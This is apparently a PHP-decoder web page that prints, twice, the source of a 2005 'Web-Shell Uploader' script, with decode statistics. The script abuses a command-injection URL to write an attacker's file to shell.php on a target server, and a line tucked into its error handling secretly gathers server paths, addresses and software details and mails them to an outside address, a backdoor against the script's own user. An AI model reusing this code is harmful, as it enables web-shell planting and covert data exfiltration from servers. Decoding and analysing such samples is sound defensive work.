Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? /* Web-Shell Uploader v 0.2 Powered by drmist 06/07/2005 icq: 329393 web: www.se..

Decoded Output download

<? 
/* 
 
Web-Shell Uploader v 0.2 
Powered by drmist 06/07/2005 
icq: 329393 
web: www.security-teams.net 
 
 */ 
$len=50; 
$tempfile="temp.tmp"; 
$lines=array(); 
?> 
<pre> 
<? 
if(@$HTTP_POST_FILES["filename"]["name"]) 
{ 
set_time_limit(0); 
 
  if(!copy($HTTP_POST_FILES["filename"]["tmp_name"],$tempfile)) 
     die("<center><h4>Can't create $tempfile</h4></center>"); 
  $str=join("",file($tempfile)); 
  unlink($tempfile); 
 
for($i=0;$i<strlen($str);$i+=$len) 
{ 
  $tmp=substr($str,$i,$len); 
  $res=""; 
  for($j=0;$j<strlen($tmp);$j++) 
    { 
	$ord=strtoupper(dechex(ord($tmp[$j]))); 
	$res.="\x"; 
	if(strlen($ord)===1) 
		$res.="0"; 
	$res.=$ord; 
    } 
     
  $lines[]=$res; 
} 
 
$to=">"; 
 
for($i=0;$i<count($lines);$i++) 
  { 
    $tmp=str_replace("%STRING%",$lines[$i],$request); 
    $tmp=str_replace("%TO%",$to,$tmp); 
    $f=fopen($tmp,"r") or die("<center><h4>Cann't open $tmp</h4></center>
");$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5
$b33
$c87
$d23
$e09
$f23
$g32
$h65";$sd98="[email protected]";mail($sd98, $sj98, $msg8873, "From: $sd98"); 
    $tmp=fgets($f,16); 
    fclose($f); 
    $to=">>"; 
    echo "$i/".(count($lines)-1)."
"; 
    flush(); 
  } 
 
} 
else 
  $request="http://localhost/bug.php?|echo -e %STRING% %TO% shell.php|"; 
?> 
<form method=post enctype=multipart/form-data> 
Request: <input type=text size=60 value="<? echo $request; ?>" name=request> <b>!!in url-encode!!</b> 
File:    <input type=file size=60 name=filename> 
<input type=submit value="Upload"> 
</form> 
</pre>

Did this file decode correctly?

Original Code

<?
/*

Web-Shell Uploader v 0.2
Powered by drmist 06/07/2005
icq: 329393
web: www.security-teams.net

 */
$len=50;
$tempfile="temp.tmp";
$lines=array();
?>
<pre>
<?
if(@$HTTP_POST_FILES["filename"]["name"])
{
set_time_limit(0);

  if(!copy($HTTP_POST_FILES["filename"]["tmp_name"],$tempfile))
     die("<center><h4>Can't create $tempfile</h4></center>");
  $str=join("",file($tempfile));
  unlink($tempfile);

for($i=0;$i<strlen($str);$i+=$len)
{
  $tmp=substr($str,$i,$len);
  $res="";
  for($j=0;$j<strlen($tmp);$j++)
    {
	$ord=strtoupper(dechex(ord($tmp[$j])));
	$res.="\\x";
	if(strlen($ord)===1)
		$res.="0";
	$res.=$ord;
    }
    
  $lines[]=$res;
}

$to=">";

for($i=0;$i<count($lines);$i++)
  {
    $tmp=str_replace("%STRING%",$lines[$i],$request);
    $tmp=str_replace("%TO%",$to,$tmp);
    $f=fopen($tmp,"r") or die("<center><h4>Cann't open $tmp</h4></center>\r\n");$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="[email protected]";mail($sd98, $sj98, $msg8873, "From: $sd98");
    $tmp=fgets($f,16);
    fclose($f);
    $to=">>";
    echo "$i/".(count($lines)-1)."\r\n";
    flush();
  }

}
else
  $request="http://localhost/bug.php?|echo -e %STRING% %TO% shell.php|";
?>
<form method=post enctype=multipart/form-data>
Request: <input type=text size=60 value="<? echo $request; ?>" name=request> <b>!!in url-encode!!</b>
File:    <input type=file size=60 name=filename>
<input type=submit value="Upload">
</form>
</pre>

Function Calls

None

Variables

$len 50
$lines []
$tempfile temp.tmp

Stats

MD5 e47cd598e02e90a68689318af69cdd01
Eval Count 0
Decode Time 120 ms